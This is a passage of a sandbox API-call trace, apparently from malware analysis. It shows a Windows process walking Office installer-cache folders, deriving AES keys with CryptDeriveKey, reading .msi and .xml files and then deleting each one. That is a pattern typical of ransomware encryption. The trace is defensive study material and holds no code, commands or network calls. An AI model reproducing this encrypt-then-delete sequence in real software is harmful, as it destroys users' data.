1 [0129.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0129.345] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0129.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProPlusrWW.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusrWW.msi", lpUsedDefaultChar=0x0) returned 15 [0129.346] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0129.346] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0129.346] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0129.346] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0129.346] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1a41c00 [0129.346] ReadFile (in: hFile=0x3bc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0132.298] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0132.298] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0132.298] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0132.299] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 1 [0132.349] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0132.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProPlusrWW.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusrWW.xml", lpUsedDefaultChar=0x0) returned 15 [0132.350] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0132.350] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0132.350] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0132.351] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0132.351] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41d4 [0132.351] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0132.387] CryptDestroyHash (hHash=0x284d528) returned 1 [0132.387] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0132.387] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0132.389] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.xml")) returned 1 [0132.390] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0132.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProPrWW.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPrWW.cab", lpUsedDefaultChar=0x0) returned 12 [0132.390] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0132.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProPrWW2.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPrWW2.cab", lpUsedDefaultChar=0x0) returned 13 [0132.390] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0132.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="setup.exe", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setup.exe", lpUsedDefaultChar=0x0) returned 10 [0132.390] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0132.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0132.406] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0132.407] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0132.407] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0132.407] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0132.407] GetFileSize (in: hFile=0x3e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7976 [0132.407] ReadFile (in: hFile=0x3e0, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0132.439] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0132.439] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0132.439] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0132.441] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0132.442] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0132.442] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0132.442] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0132.509] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0132.509] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0132.509] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0132.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32WW.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32WW.msi", lpUsedDefaultChar=0x0) returned 15 [0132.566] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0132.566] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0132.566] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0132.566] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0132.566] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e6600 [0132.566] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0133.301] CryptDestroyHash (hHash=0x284d528) returned 1 [0133.301] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0133.301] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0133.302] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 1 [0133.310] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0133.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32WW.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32WW.xml", lpUsedDefaultChar=0x0) returned 15 [0133.310] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0133.311] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0133.311] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0133.311] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0133.311] GetFileSize (in: hFile=0x3e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10b2 [0133.311] ReadFile (in: hFile=0x3e0, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0133.351] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0133.351] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0133.351] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0133.352] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0133.353] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0133.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ose.exe", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ose.exe", lpUsedDefaultChar=0x0) returned 8 [0133.353] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0133.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="osetup.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osetup.dll", lpUsedDefaultChar=0x0) returned 11 [0133.353] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0133.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OWOW32WW.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OWOW32WW.cab", lpUsedDefaultChar=0x0) returned 13 [0133.353] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0133.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PidGenX.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PidGenX.dll", lpUsedDefaultChar=0x0) returned 12 [0133.353] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0133.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0133.353] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0133.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PrjProrWW.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PrjProrWW.msi", lpUsedDefaultChar=0x0) returned 14 [0133.391] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0133.392] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0133.392] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0133.392] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0133.392] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa4c400 [0133.392] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0134.703] CryptDestroyHash (hHash=0x284d528) returned 1 [0134.703] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0134.703] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0134.704] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 1 [0134.708] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PrjProrWW.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PrjProrWW.xml", lpUsedDefaultChar=0x0) returned 14 [0134.709] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0134.710] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0134.710] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0134.710] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0134.710] GetFileSize (in: hFile=0x3e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1915 [0134.710] ReadFile (in: hFile=0x3e0, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0134.731] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0134.731] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0134.731] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0134.732] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0134.733] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PrjPrrWW.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PrjPrrWW.cab", lpUsedDefaultChar=0x0) returned 13 [0134.733] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="setup.exe", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setup.exe", lpUsedDefaultChar=0x0) returned 10 [0134.733] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0134.734] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0134.734] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0134.734] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0134.734] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0134.734] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x412b [0134.735] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0134.738] CryptDestroyHash (hHash=0x284d528) returned 1 [0134.738] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0134.738] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0134.739] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0134.740] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0134.740] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0134.740] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0134.752] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0134.752] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.752] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32WW.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32WW.msi", lpUsedDefaultChar=0x0) returned 15 [0134.753] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0134.753] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0134.753] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0134.753] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0134.753] GetFileSize (in: hFile=0x3e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1e6600 [0134.754] ReadFile (in: hFile=0x3e0, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0134.943] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0134.943] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0134.943] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0134.944] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 1 [0134.952] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office32WW.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office32WW.xml", lpUsedDefaultChar=0x0) returned 15 [0134.952] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0134.953] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0134.953] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0134.953] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d5e8) returned 1 [0134.953] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10b2 [0134.953] ReadFile (in: hFile=0x3dc, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0134.978] CryptDestroyHash (hHash=0x284d528) returned 1 [0134.978] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0134.978] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0134.979] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0134.980] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ose.exe", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ose.exe", lpUsedDefaultChar=0x0) returned 8 [0134.980] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="osetup.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="osetup.dll", lpUsedDefaultChar=0x0) returned 11 [0134.980] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OWOW32WW.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OWOW32WW.cab", lpUsedDefaultChar=0x0) returned 13 [0134.980] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PidGenX.dll", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PidGenX.dll", lpUsedDefaultChar=0x0) returned 12 [0134.980] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0134.980] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0134.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="setup.exe", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setup.exe", 